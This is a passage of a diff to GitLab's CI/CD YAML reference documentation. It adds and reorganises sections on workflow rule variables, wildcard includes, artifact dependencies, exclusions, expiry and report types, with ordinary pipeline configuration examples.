ruby:2.7 script: bundle exec rspec ``` @@ -172,6 +172,7 @@ a preconfigured `workflow: rules` entry. - [`when`](#when): Specify what to do when the `if` rule evaluates to true. - To run a pipeline, set to `always`. - To prevent pipelines from running, set to `never`. +- [`variables`](#workflowrulesvariables): If not defined, uses the [variables defined elsewhere](#variables). When no rules evaluate to true, the pipeline does not run. @@ -222,6 +223,87 @@ request pipelines. If your rules match both branch pipelines and merge request pipelines, [duplicate pipelines](#avoid-duplicate-pipelines) can occur. +#### `workflow:rules:variables` + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/294232) in GitLab 13.11. +> - It's [deployed behind a feature flag](../../user/feature_flags.md), disabled by default. +> - It's disabled on GitLab.com. +> - It's not recommended for production use. +> - To use it in GitLab self-managed instances, ask a GitLab administrator to [enable it](#enable-or-disable-workflowrulesvariables). **(CORE ONLY)** + +WARNING: +This feature might not be available to you. Check the **version history** note above for details. + +You can use [`variables`](#variables) in `workflow:rules:` to define variables for specific pipeline conditions. + +For example: + +```yaml +variables: + DEPLOY_VARIABLE: "default-deploy" + +workflow: + rules: + - if: $CI_COMMIT_REF_NAME =~ /master/ + variables: + DEPLOY_VARIABLE: "deploy-production" # Override globally-defined DEPLOY_VARIABLE + - if: $CI_COMMIT_REF_NAME =~ /feature/ + variables: + IS_A_FEATURE: "true" # Define a new variable. + - when: always # Run the pipeline in other cases + +job1: + variables: + DEPLOY_VARIABLE: "job1-default-deploy" + rules: + - if: $CI_COMMIT_REF_NAME =~ /master/ + variables: # Override DEPLOY_VARIABLE defined + DEPLOY_VARIABLE: "job1-deploy-production" # at the job level. + - when: on_success # Run the job in other cases + script: + - echo "Run script with $DEPLOY_VARIABLE as an argument" + - echo "Run another script if $IS_A_FEATURE exists" + +job2: + script: + - echo "Run script with $DEPLOY_VARIABLE as an argument" + - echo "Run another script if $IS_A_FEATURE exists" +``` + +When the branch is `master`: + +- job1's `DEPLOY_VARIABLE` is `job1-deploy-production`. +- job2's `DEPLOY_VARIABLE` is `deploy-production`. + +When the branch is `feature`: + +- job1's `DEPLOY_VARIABLE` is `job1-default-deploy`, and `IS_A_FEATURE` is `true`. +- job2's `DEPLOY_VARIABLE` is `default-deploy`, and `IS_A_FEATURE` is `true`. + +When the branch is something else: + +- job1's `DEPLOY_VARIABLE` is `job1-default-deploy`. +- job2's `DEPLOY_VARIABLE` is `default-deploy`. + +##### Enable or disable workflow:rules:variables **(CORE ONLY)** + +rules:variables is under development and not ready for production use. +It is deployed behind a feature flag that is **disabled by default**. +[GitLab administrators with access to the GitLab Rails console](../../administration/feature_flags.md) +can enable it. + +To enable it: + +```ruby +Feature.enable(:ci_workflow_rules_variables) +``` + +To disable it: + +```ruby +Feature.disable(:ci_workflow_rules_variables) +``` + #### `workflow:rules` templates > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/217732) in GitLab 13.0. @@ -395,6 +477,41 @@ include: '.gitlab-ci-production.yml' Use local includes instead of symbolic links. +##### `include:local` with wildcard file paths + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/25921) in GitLab 13.11. +> - It's [deployed behind a feature flag](../../user/feature_flags.md), disabled by default. +> - It's disabled on GitLab.com. +> - It's not recommended for production use. +> - To use it in GitLab self-managed instances, ask a GitLab administrator to enable it. **(CORE ONLY)** + +You can use wildcard paths (`*`) with `include:local`. + +Example: + +```yaml +include: 'configs/*.yml' +``` + +When the pipeline runs, it adds all `.yml` files in the `configs` folder into the pipeline configuration. + +The wildcard file paths feature is under development and not ready for production use. It is +deployed behind a feature flag that is **disabled by default**. +[GitLab administrators with access to the GitLab Rails console](../../administration/feature_flags.md) +can enable it. + +To enable it: + +```ruby +Feature.enable(:ci_wildcard_file_paths) +``` + +To disable it: + +```ruby +Feature.disable(:ci_wildcard_file_paths) +``` + #### `include:file` > [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/53903) in GitLab 11.7. @@ -512,7 +629,7 @@ Use `image` to specify [a Docker image](../docker/using_docker_images.md#what-is For: -- Usage examples, see [Define `image` and `services` from `.gitlab-ci.yml`](../docker/using_docker_images.md#define-image-and-services-from-gitlab-ciyml). +- Usage examples, see [Define `image` in the `.gitlab-ci.yml` file](../docker/using_docker_images.md#define-image-in-the-gitlab-ciyml-file). - Detailed usage information, refer to [Docker integration](../docker/index.md) documentation. #### `image:name` @@ -529,11 +646,11 @@ For more information, see [Available settings for `image`](../docker/using_docke #### `services` -Use `services` to specify a [service Docker image](../docker/using_docker_images.md#what-is-a-service), linked to a base image specified in [`image`](#image). +Use `services` to specify a [service Docker image](../services/index.md), linked to a base image specified in [`image`](#image). For: -- Usage examples, see [Define `image` and `services` from `.gitlab-ci.yml`](../docker/using_docker_images.md#define-image-and-services-from-gitlab-ciyml). +- Usage examples, see [Define `services` in the `.gitlab-ci.yml` file](../services/index.md#define-services-in-the-gitlab-ciyml-file). - Detailed usage information, refer to [Docker integration](../docker/index.md) documentation. - Example services, see [GitLab CI/CD Services](../services/index.md). @@ -541,25 +658,25 @@ For: An [extended Docker configuration option](../docker/using_docker_images.md#extended-docker-configuration-options). -For more information, see [Available settings for `services`](../docker/using_docker_images.md#available-settings-for-services). +For more information, see [Available settings for `services`](../services/index.md#available-settings-for-services). ##### `services:alias` An [extended Docker configuration option](../docker/using_docker_images.md#extended-docker-configuration-options). -For more information, see [Available settings for `services`](../docker/using_docker_images.md#available-settings-for-services). +For more information, see [Available settings for `services`](../services/index.md#available-settings-for-services). ##### `services:entrypoint` An [extended Docker configuration option](../docker/using_docker_images.md#extended-docker-configuration-options). -For more information, see [Available settings for `services`](../docker/using_docker_images.md#available-settings-for-services). +For more information, see [Available settings for `services`](../services/index.md#available-settings-for-services). ##### `services:command` An [extended Docker configuration option](../docker/using_docker_images.md#extended-docker-configuration-options). -For more information, see [Available settings for `services`](../docker/using_docker_images.md#available-settings-for-services). +For more information, see [Available settings for `services`](../services/index.md#available-settings-for-services). ### `script` @@ -1069,8 +1186,8 @@ job: - when: on_success ``` -- If the pipeline is for a merge request, the job is **not** be added to the pipeline. -- If the pipeline is a scheduled pipeline, the job is **not** be added to the pipeline. +- If the pipeline is for a merge request, the job is **not** added to the pipeline. +- If the pipeline is a scheduled pipeline, the job is **not** added to the pipeline. - In **all other cases**, the job is added to the pipeline, with `when: on_success`. WARNING: @@ -1180,7 +1297,7 @@ expression string per rule, rather than an array of them. Any set of expressions evaluated can be [conjoined into a single expression](../variables/README.md#conjunction--disjunction) by using `&&` or `||`, and the [variable matching operators (`==`, `!=`, `=~` and `!~`)](../variables/README.md#syntax-of-cicd-variable-expressions). -Unlike variables in [`script`](../variables/README.md#syntax-of-cicd-variables-in-job-scripts) +Unlike variables in [`script`](../variables/README.md#use-cicd-variables-in-job-scripts) sections, variables in rules expressions are always formatted as `$VARIABLE`. `if:` clauses are evaluated based on the values of [predefined CI/CD variables](../variables/predefined_variables.md) @@ -1357,7 +1474,9 @@ job: Paths are relative to the project directory (`$CI_PROJECT_DIR`) and can't directly link outside it. -You can use glob patterns to match multiple files in any directory in the repository: +You can use [glob](https://en.wikipedia.org/wiki/Glob_(programming)) +patterns to match multiple files in any directory +in the repository: ```yaml job: @@ -1794,7 +1913,8 @@ WARNING: If you use `only:changes` with [only allow merge requests to be merged if the pipeline succeeds](../../user/project/merge_requests/merge_when_pipeline_succeeds.md#only-allow-merge-requests-to-be-merged-if-the-pipeline-succeeds), you should [also use `only:merge_requests`](#use-onlychanges-with-pipelines-for-merge-requests). Otherwise it may not work as expected. -You can also use glob patterns to match multiple files in either the root directory +You can also use [glob](https://en.wikipedia.org/wiki/Glob_(programming)) +patterns to match multiple files in either the root directory of the repository, or in _any_ directory in the repository. However, they must be wrapped in double quotes or GitLab can't parse them: @@ -1983,6 +2103,10 @@ To disable directed acyclic graphs (DAG), set the limit to `0`. > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/14311) in GitLab v12.6. +When a job uses `needs`, it no longer downloads all artifacts from previous stages +by default, because jobs with `needs` can start before earlier stages complete. With +`needs` you can only download artifacts from the jobs listed in the `needs:` configuration. + Use `artifacts: true` (default) or `artifacts: false` to control when artifacts are downloaded in jobs that use `needs`. @@ -2145,10 +2269,11 @@ To download artifacts from a job in the current pipeline, use the basic form of #### Optional `needs` > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/30680) in GitLab 13.10. -> - It's [deployed behind a feature flag](../../user/feature_flags.md), disabled by default. -> - It's disabled on GitLab.com. -> - It's not recommended for production use. -> - To use it in GitLab self-managed instances, ask a GitLab administrator to [enable it](#enable-or-disable-optional-needs). **(FREE SELF)** +> - [Deployed behind a feature flag](../../user/feature_flags.md), disabled by default. +> - [Enabled by default](https://gitlab.com/gitlab-org/gitlab/-/issues/323891) in GitLab 13.11. +> - Enabled on GitLab.com. +> - Recommended for production use. +> - For GitLab self-managed instances, GitLab administrators can opt to [disable it](#enable-or-disable-optional-needs). **(FREE SELF)** WARNING: This feature might not be available to you. Check the **version history** note above for details. @@ -2187,10 +2312,10 @@ rspec: #### Enable or disable optional needs **(FREE SELF)** -Optional needs is under development and not ready for production use. It is -deployed behind a feature flag that is **disabled by default**. +Optional needs is under development but ready for production use. +It is deployed behind a feature flag that is **enabled by default**. [GitLab administrators with access to the GitLab Rails console](../../administration/feature_flags.md) -can enable it. +can opt to disable it. To enable it: @@ -2325,8 +2450,8 @@ The valid values of `when` are: 1. `delayed` - [Delay the execution of a job](#whendelayed) for a specified duration. Added in GitLab 11.14. 1. `never`: - - With [`rules`](#rules), don't execute job. - - With [`workflow`](#workflow), don't run pipeline. + - With job [`rules`](#rules), don't execute job. + - With [`workflow:rules`](#workflow), don't run pipeline. In the following example, the script: @@ -2579,9 +2704,9 @@ Use the `action` keyword to specify jobs that prepare, start, or stop environmen | **Value** | **Description** | |-----------|---------------------------------------------------------------------------------------------------------------------------------------------------------------| -| start | Default value. Indicates that job starts the environment. The deployment is created after the job starts. | -| prepare | Indicates that job is only preparing the environment. Does not affect deployments. [Read more about environments](../environments/index.md#prepare-an-environment) | -| stop | Indicates that job stops deployment. See the example below. | +| `start` | Default value. Indicates that job starts the environment. The deployment is created after the job starts. | +| `prepare` | Indicates that the job is only preparing the environment. It does not trigger deployments. [Read more about preparing environments](../environments/index.md#prepare-an-environment-without-creating-a-deployment). | +| `stop` | Indicates that job stops deployment. See the example below. | Take for instance: @@ -2614,7 +2739,7 @@ the GitLab UI to run. Also in the example, `GIT_STRATEGY` is set to `none`. If the `stop_review_app` job is [automatically triggered](../environments/index.md#stopping-an-environment), -the runner won’t try to check out the code after the branch is deleted. +the runner won't try to check out the code after the branch is deleted. The example also overwrites global variables. If your `stop` `environment` job depends on global variables, use [anchor variables](#yaml-anchors-for-variables) when you set the `GIT_STRATEGY` @@ -2630,8 +2755,8 @@ The `stop_review_app` job is **required** to have the following keywords defined - `environment:name` - `environment:action` -Additionally, both jobs should have matching [`rules`](../yaml/README.md#onlyexcept-basic) -or [`only/except`](../yaml/README.md#onlyexcept-basic) configuration. +Additionally, both jobs should have matching [`rules`](#onlyexcept-basic) +or [`only/except`](#onlyexcept-basic) configuration. In the examples above, if the configuration is not identical: @@ -2695,7 +2820,7 @@ To follow progress on support for GitLab-managed clusters, see the #### `environment:deployment_tier` -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/27630) in GitLab 13.10. +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/300741) in GitLab 13.10. Use the `deployment_tier` keyword to specify the tier of the deployment environment: @@ -2759,7 +2884,7 @@ patterns and: - In [GitLab Runner 13.0](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/2620) and later, [`doublestar.Glob`](https://pkg.go.dev/github.com/bmatcuk/doublestar@v1.2.2?tab=doc#Match). - In GitLab Runner 12.10 and earlier, -[`filepath.Match`](https://pkg.go.dev/path/filepath/#Match). +[`filepath.Match`](https://pkg.go.dev/path/filepath#Match). Cache all files in `binaries` that end in `.apk` and the `.config` file: @@ -2831,13 +2956,11 @@ You can specify a [fallback cache key](#fallback-cache-key) to use if the specif ##### Multiple caches > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/32814) in GitLab 13.10. -> - It's [deployed behind a feature flag](../../user/feature_flags.md), disabled by default. -> - It's disabled on GitLab.com. -> - It's not recommended for production use. -> - To use it in GitLab self-managed instances, ask a GitLab administrator to [enable it](#enable-or-disable-multiple-caches). **(FREE SELF)** - -WARNING: -This feature might not be available to you. Check the **version history** note above for details. +> - [Deployed behind a feature flag](../../user/feature_flags.md), disabled by default. +> - [Enabled by default](https://gitlab.com/gitlab-org/gitlab/-/issues/321877) in GitLab 13.11. +> - Enabled on GitLab.com. +> - Recommended for production use. +> - For GitLab self-managed instances, GitLab administrators can opt to [disable it](#enable-or-disable-multiple-caches). **(FREE SELF)** You can have a maximum of four caches: @@ -2866,10 +2989,10 @@ the fallback is fetched multiple times if multiple caches are not found. ##### Enable or disable multiple caches **(FREE SELF)** -The multiple caches feature is under development and not ready for production use. -It is deployed behind a feature flag that is **disabled by default**. +The multiple caches feature is under development but ready for production use. +It is deployed behind a feature flag that is **enabled by default**. [GitLab administrators with access to the GitLab Rails console](../../administration/feature_flags.md) -can enable it. +can opt to disable it. To enable it: @@ -3072,98 +3195,87 @@ The artifacts are sent to GitLab after the job finishes. They are available for download in the GitLab UI if the size is not larger than the [maximum artifact size](../../user/gitlab_com/index.md#gitlab-cicd). +By default, jobs in later stages automatically download all the artifacts created +by jobs in earlier stages. You can control artifact download behavior in jobs with +[`dependencies`](#dependencies). + +When using the [`needs`](#artifact-downloads-with-needs) keyword, jobs can only download +artifacts from the jobs defined in the `needs` configuration. + Job artifacts are only collected for successful jobs by default, and artifacts are restored after [caches](#cache). [Read more about artifacts](../pipelines/job_artifacts.md). -#### `artifacts:paths` - -Paths are relative to the project directory (`$CI_PROJECT_DIR`) and can't directly -link outside it. You can use Wildcards that use [glob](https://en.wikipedia.org/wiki/Glob_(programming)) -patterns and: - -- In [GitLab Runner 13.0](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/2620) and later, -[`doublestar.Glob`](https://pkg.go.dev/github.com/bmatcuk/doublestar@v1.2.2?tab=doc#Match). -- In GitLab Runner 12.10 and earlier, -[`filepath.Match`](https://pkg.go.dev/path/filepath/#Match). +#### `dependencies` -To restrict which jobs a specific job fetches artifacts from, see [dependencies](#dependencies). +By default, all `artifacts` from previous stages +are passed to each job. However, you can use the `dependencies` keyword to +define a limited list of jobs to fetch artifacts from. You can also set a job to download no artifacts at all. -Send all files in `binaries` and `.config`: +To use this feature, define `dependencies` in context of the job and pass +a list of all previous jobs the artifacts should be downloaded from. -```yaml -artifacts: - paths: - - binaries/ - - .config -``` +You can define jobs from stages that were executed before the current one. +An error occurs if you define jobs from the current or an upcoming stage. -To disable artifact passing, define the job with empty [dependencies](#dependencies): +To prevent a job from downloading artifacts, define an empty array. -```yaml -job: - stage: build - script: make build - dependencies: [] -``` +When you use `dependencies`, the status of the previous job is not considered. +If a job fails or it's a manual job that isn't triggered, no error occurs. -You may want to create artifacts only for tagged releases to avoid filling the -build server storage with temporary build artifacts. +The following example defines two jobs with artifacts: `build:osx` and +`build:linux`. When the `test:osx` is executed, the artifacts from `build:osx` +are downloaded and extracted in the context of the build. The same happens +for `test:linux` and artifacts from `build:linux`. -Create artifacts only for tags (`default-job` doesn't create artifacts): +The job `deploy` downloads artifacts from all previous jobs because of +the [stage](#stages) precedence: ```yaml -default-job: - script: - - mvn test -U - except: - - tags - -release-job: - script: - - mvn package -U +build:osx: + stage: build + script: make build:osx artifacts: paths: - - target/*.war - only: - - tags -``` - -You can use wildcards for directories too. For example, if you want to get all the files inside the directories that end with `xyz`: + - binaries/ -```yaml -job: +build:linux: + stage: build + script: make build:linux artifacts: paths: - - path/*xyz/* -``` + - binaries/ -#### `artifacts:public` +test:osx: + stage: test + script: make test:osx + dependencies: + - build:osx -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/49775) in GitLab 13.8 -> - It's [deployed behind a feature flag](../../user/feature_flags.md), disabled by default. -> - It's enabled on GitLab.com. -> - It's recommended for production use. +test:linux: + stage: test + script: make test:linux + dependencies: + - build:linux -Use `artifacts:public` to determine whether the job artifacts should be -publicly available. +deploy: + stage: deploy + script: make deploy +``` -The default for `artifacts:public` is `true` which means that the artifacts in -public pipelines are available for download by anonymous and guest users: +##### When a dependent job fails -```yaml -artifacts: - public: true -``` +> Introduced in GitLab 10.3. -To deny read access for anonymous and guest users to artifacts in public -pipelines, set `artifacts:public` to `false`: +If the artifacts of the job that is set as a dependency are +[expired](#artifactsexpire_in) or +[deleted](../pipelines/job_artifacts.md#delete-job-artifacts), then +the dependent job fails. -```yaml -artifacts: - public: false -``` +You can ask your administrator to +[flip this switch](../../administration/job_artifacts.md#validation-for-dependencies) +and bring back the old behavior. #### `artifacts:exclude` @@ -3176,7 +3288,7 @@ archive. Similar to [`artifacts:paths`](#artifactspaths), `exclude` paths are relative to the project directory. You can use Wildcards that use [glob](https://en.wikipedia.org/wiki/Glob_(programming)) or -[`filepath.Match`](https://golang.org/pkg/path/filepath/#Match) patterns. +[`doublestar.PathMatch`](https://pkg.go.dev/github.com/bmatcuk/doublestar@v1.2.2?tab=doc#PathMatch) patterns. For example, to store all files in `binaries/`, but not `*.o` files located in subdirectories of `binaries/`: @@ -3189,9 +3301,68 @@ artifacts: - binaries/**/*.o ``` +Unlike [`artifacts:paths`](#artifactspaths), `exclude` paths are not recursive. To exclude all of the contents of a directory, you can match them explicitly rather than matching the directory itself. + +For example, to store all files in `binaries/` but nothing located in the `temp/` subdirectory: + +```yaml +artifacts: + paths: + - binaries/ + exclude: + - binaries/temp/**/* +``` + Files matched by [`artifacts:untracked`](#artifactsuntracked) can be excluded using `artifacts:exclude` too. +#### `artifacts:expire_in` + +Use `expire_in` to specify how long artifacts are active before they +expire and are deleted. + +The expiration time period begins when the artifact is uploaded and +stored on GitLab. If the expiry time is not defined, it defaults to the +[instance wide setting](../../user/admin_area/settings/continuous_integration.md#default-artifacts-expiration) +(30 days by default). + +To override the expiration date and protect artifacts from being automatically deleted: + +- Use the **Keep** button on the job page. +- Set the value of `expire_in` to `never`. [Available](https://gitlab.com/gitlab-org/gitlab/-/issues/22761) + in GitLab 13.3 and later. + +After their expiry, artifacts are deleted hourly by default (via a cron job), +and are not accessible anymore. + +The value of `expire_in` is an elapsed time in seconds, unless a unit is +provided. Examples of valid values: + +- `'42'` +- `42 seconds` +- `3 mins 4 sec` +- `2 hrs 20 min` +- `2h20min` +- `6 mos 1 day` +- `47 yrs 6 mos and 4d` +- `3 weeks and 2 days` +- `never` + +To expire artifacts 1 week after being uploaded: + +```yaml +job: + artifacts: + expire_in: 1 week +``` + +The latest artifacts for refs are locked against deletion, and kept regardless of +the expiry time. [Introduced in](https://gitlab.com/gitlab-org/gitlab/-/issues/16267) +GitLab 13.0 behind a disabled feature flag, and [made the default behavior](https://gitlab.com/gitlab-org/gitlab/-/issues/229936) +in GitLab 13.4. + +In [GitLab 13.8 and later](https://gitlab.com/gitlab-org/gitlab/-/issues/241026), you can [disable this behavior at the project level in the CI/CD settings](../pipelines/job_artifacts.md#keep-artifacts-from-most-recent-successful-jobs). In [GitLab 13.9 and later](https://gitlab.com/gitlab-org/gitlab/-/issues/276583), you can [disable this behavior instance-wide](../../user/admin_area/settings/continuous_integration.md#keep-the-latest-artifacts-for-all-jobs-in-the-latest-successful-pipelines). + #### `artifacts:expose_as` > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/15018) in GitLab 12.5. @@ -3210,7 +3381,8 @@ test: ``` With this configuration, GitLab adds a link **artifact 1** to the relevant merge request -that points to `file1.txt`. +that points to `file1.txt`. To access the link, select **View exposed artifact** +below the pipeline graph in the merge request overview. An example that matches an entire directory: @@ -3227,7 +3399,7 @@ Note the following: - Artifacts do not display in the merge request UI when using variables to define the `artifacts:paths`. - A maximum of 10 job artifacts per merge request can be exposed. - Glob patterns are unsupported. -- If a directory is specified, the link is to the job [artifacts browser](../pipelines/job_artifacts.md#browsing-artifacts) if there is more than +- If a directory is specified, the link is to the job [artifacts browser](../pipelines/job_artifacts.md#download-job-artifacts) if there is more than one file in the directory. - For exposed single file artifacts with `.html`, `.htm`, `.txt`, `.json`, `.xml`, and `.log` extensions, if [GitLab Pages](../../administration/pages/index.md) is: @@ -3311,197 +3483,397 @@ job: - binaries/ ``` -#### `artifacts:untracked` +#### `artifacts:paths` -Use `artifacts:untracked` to add all Git untracked files as artifacts (along -with the paths defined in `artifacts:paths`). `artifacts:untracked` ignores configuration -in the repository's `.gitignore` file. +Paths are relative to the project directory (`$CI_PROJECT_DIR`) and can't directly +link outside it. You can use Wildcards that use [glob](https://en.wikipedia.org/wiki/Glob_(programming)) +patterns and: -Send all Git untracked files: +- In [GitLab Runner 13.0](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/2620) and later, +[`doublestar.Glob`](https://pkg.go.dev/github.com/bmatcuk/doublestar@v1.2.2?tab=doc#Match). +- In GitLab Runner 12.10 and earlier, +[`filepath.Match`](https://pkg.go.dev/path/filepath#Match). -```yaml -artifacts: - untracked: true -``` +To restrict which jobs a specific job fetches artifacts from, see [dependencies](#dependencies). -Send all Git untracked files and files in `binaries`: +Send all files in `binaries` and `.config`: ```yaml artifacts: - untracked: true paths: - binaries/ + - .config ``` -Send all untracked files but [exclude](#artifactsexclude) `*.txt`: +To disable artifact passing, define the job with empty [dependencies](#dependencies): ```yaml -artifacts: - untracked: true - exclude: - - "*.txt" +job: + stage: build + script: make build + dependencies: [] ``` -#### `artifacts:when` +You may want to create artifacts only for tagged releases to avoid filling the +build server storage with temporary build artifacts. -Use `artifacts:when` to upload artifacts on job failure or despite the -failure. +Create artifacts only for tags (`default-job` doesn't create artifacts): -`artifacts:when` can be set to one of the following values: +```yaml +default-job: + script: + - mvn test -U + except: + - tags -1. `on_success` (default): Upload artifacts only when the job succeeds. -1. `on_failure`: Upload artifacts only when the job fails. -1. `always`: Always upload artifacts. +release-job: + script: + - mvn package -U + artifacts: + paths: + - target/*.war + only: + - tags +``` -For example, to upload artifacts only when a job fails: +You can use wildcards for directories too. For example, if you want to get all the files inside the directories that end with `xyz`: ```yaml job: artifacts: - when: on_failure + paths: + - path/*xyz/* ``` -#### `artifacts:expire_in` +#### `artifacts:public` -Use `expire_in` to specify how long artifacts are active before they -expire and are deleted. +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/49775) in GitLab 13.8 +> - It's [deployed behind a feature flag](../../user/feature_flags.md), disabled by default. +> - It's enabled on GitLab.com. +> - It's recommended for production use. -The expiration time period begins when the artifact is uploaded and -stored on GitLab. If the expiry time is not defined, it defaults to the -[instance wide setting](../../user/admin_area/settings/continuous_integration.md#default-artifacts-expiration) -(30 days by default). +Use `artifacts:public` to determine whether the job artifacts should be +publicly available. -To override the expiration date and protect artifacts from being automatically deleted: +The default for `artifacts:public` is `true` which means that the artifacts in +public pipelines are available for download by anonymous and guest users: -- Use the **Keep** button on the job page. -- Set the value of `expire_in` to `never`. [Available](https://gitlab.com/gitlab-org/gitlab/-/issues/22761) - in GitLab 13.3 and later. +```yaml +artifacts: + public: true +``` -After their expiry, artifacts are deleted hourly by default (via a cron job), -and are not accessible anymore. +To deny read access for anonymous and guest users to artifacts in public +pipelines, set `artifacts:public` to `false`: -The value of `expire_in` is an elapsed time in seconds, unless a unit is -provided. Examples of valid values: +```yaml +artifacts: + public: false +``` -- `'42'` -- `42 seconds` -- `3 mins 4 sec` -- `2 hrs 20 min` -- `2h20min` -- `6 mos 1 day` -- `47 yrs 6 mos and 4d` -- `3 weeks and 2 days` -- `never` +#### `artifacts:reports` -To expire artifacts 1 week after being uploaded: +> - [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/20390) in GitLab 11.2. +> - Requires GitLab Runner 11.2 and above. + +Use [`artifacts:reports`](#artifactsreports) +to collect test reports, code quality reports, and security reports from jobs. +It also exposes these reports in the GitLab UI (merge requests, pipeline views, and security dashboards). + +The test reports are collected regardless of the job results (success or failure). +You can use [`artifacts:expire_in`](#artifactsexpire_in) to set up an expiration +date for their artifacts. + +If you also want the ability to browse the report output files, include the +[`artifacts:paths`](#artifactspaths) keyword. + +##### `artifacts:reports:api_fuzzing` **(ULTIMATE)** + +> - Introduced in GitLab 13.4. +> - Requires GitLab Runner 13.4 or later. + +The `api_fuzzing` report collects [API Fuzzing bugs](../../user/application_security/api_fuzzing/index.md) +as artifacts. + +The collected API Fuzzing report uploads to GitLab as an artifact and is summarized in merge +requests and the pipeline view. It's also used to provide data for security dashboards. + +##### `artifacts:reports:cobertura` + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/3708) in GitLab 12.9. +> - Requires [GitLab Runner](https://docs.gitlab.com/runner/) 11.5 and above. + +The `cobertura` report collects [Cobertura coverage XML files](../../user/project/merge_requests/test_coverage_visualization.md). +The collected Cobertura coverage reports upload to GitLab as an artifact +and display in merge requests. + +Cobertura was originally developed for Java, but there are many +third party ports for other languages like JavaScript, Python, Ruby, and so on. + +##### `artifacts:reports:codequality` + +> - Introduced in [GitLab Starter](https://about.gitlab.com/pricing/) 11.5. +> - Made [available in all tiers](https://gitlab.com/gitlab-org/gitlab/-/issues/212499) in GitLab 13.2. +> - Requires GitLab Runner 11.5 and above. + +The `codequality` report collects [Code Quality issues](../../user/project/merge_requests/code_quality.md) +as artifacts. + +The collected Code Quality report uploads to GitLab as an artifact and is summarized in merge requests. + +##### `artifacts:reports:container_scanning` **(ULTIMATE)** + +> - Introduced in GitLab 11.5. +> - Requires GitLab Runner 11.5 and above. + +The `container_scanning` report collects [Container Scanning vulnerabilities](../../user/application_security/container_scanning/index.md) +as artifacts. + +The collected Container Scanning report uploads to GitLab as an artifact and +is summarized in merge requests and the pipeline view. It's also used to provide data for security +dashboards. + +##### `artifacts:reports:coverage_fuzzing` **(ULTIMATE)** + +> - Introduced in GitLab 13.4. +> - Requires GitLab Runner 13.4 or later. + +The `coverage_fuzzing` report collects [coverage fuzzing bugs](../../user/application_security/coverage_fuzzing/index.md) +as artifacts. + +The collected coverage fuzzing report uploads to GitLab as an artifact and is summarized in merge +requests and the pipeline view. It's also used to provide data for security dashboards. + +##### `artifacts:reports:dast` **(ULTIMATE)** + +> - Introduced in GitLab 11.5. +> - Requires GitLab Runner 11.5 and above. + +The `dast` report collects [DAST vulnerabilities](../../user/application_security/dast/index.md) +as artifacts. + +The collected DAST report uploads to GitLab as an artifact and is summarized in merge requests and the pipeline view. It's also used to provide data for security +dashboards. + +##### `artifacts:reports:dependency_scanning` **(ULTIMATE)** + +> - Introduced in GitLab 11.5. +> - Requires GitLab Runner 11.5 and above. + +The `dependency_scanning` report collects [Dependency Scanning vulnerabilities](../../user/application_security/dependency_scanning/index.md) +as artifacts. + +The collected Dependency Scanning report uploads to GitLab as an artifact and is summarized in merge requests and the pipeline view. It's also used to provide data for security +dashboards. + +##### `artifacts:reports:dotenv` + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/17066) in GitLab 12.9. +> - Requires GitLab Runner 11.5 and later. + +The `dotenv` report collects a set of environment variables as artifacts. + +The collected variables are registered as runtime-created variables of the job, +which is useful to [set dynamic environment URLs after a job finishes](../environments/index.md#set-dynamic-environment-urls-after-a-job-finishes). + +There are a couple of exceptions to the [original dotenv rules](https://github.com/motdotla/dotenv#rules): + +- The variable key can contain only letters, digits, and underscores (`_`). +- The maximum size of the `.env` file is 5 KB. +- In GitLab 13.5 and older, the maximum number of inherited variables is 10. +- In [GitLab 13.6 and later](https://gitlab.com/gitlab-org/gitlab/-/issues/247913), + the maximum number of inherited variables is 20. +- Variable substitution in the `.env` file is not supported. +- The `.env` file can't have empty lines or comments (starting with `#`). +- Key values in the `env` file cannot have spaces or newline characters (`\n`), including when using single or double quotes. +- Quote escaping during parsing (`key = 'value'` -> `{key: "value"}`) is not supported. + +##### `artifacts:reports:junit` + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/20390) in GitLab 11.2. +> - Requires GitLab Runner 11.2 and above. + +The `junit` report collects [JUnit report format XML files](https://www.ibm.com/support/knowledgecenter/en/SSQ2R2_14.1.0/com.ibm.rsar.analysis.codereview.cobol.doc/topics/cac_useresults_junit.html) +as artifacts. Although JUnit was originally developed in Java, there are many +third party ports for other +languages like JavaScript, Python, Ruby, and so on. + +See [Unit test reports](../unit_test_reports.md) for more details and examples. +Below is an example of collecting a JUnit report format XML file from Ruby's RSpec test tool: ```yaml -job: +rspec: + stage: test + script: + - bundle install + - rspec --format RspecJunitFormatter --out rspec.xml artifacts: - expire_in: 1 week + reports: + junit: rspec.xml ``` -The latest artifacts for refs are locked against deletion, and kept regardless of -the expiry time. [Introduced in](https://gitlab.com/gitlab-org/gitlab/-/issues/16267) -GitLab 13.0 behind a disabled feature flag, and [made the default behavior](https://gitlab.com/gitlab-org/gitlab/-/issues/229936) -in GitLab 13.4. +The collected Unit test reports upload to GitLab as an artifact and display in merge requests. -In [GitLab 13.8 and later](https://gitlab.com/gitlab-org/gitlab/-/issues/241026), you can [disable this behavior at the project level in the CI/CD settings](../pipelines/job_artifacts.md#keep-artifacts-from-most-recent-successful-jobs). In [GitLab 13.9 and later](https://gitlab.com/gitlab-org/gitlab/-/issues/276583), you can [disable this behavior instance-wide](../../user/admin_area/settings/continuous_integration.md#keep-the-latest-artifacts-for-all-jobs-in-the-latest-successful-pipelines). +If the JUnit tool you use exports to multiple XML files, specify +multiple test report paths within a single job to +concatenate them into a single file. Use a filename pattern (`junit: rspec-*.xml`), +an array of filenames (`junit: [rspec-1.xml, 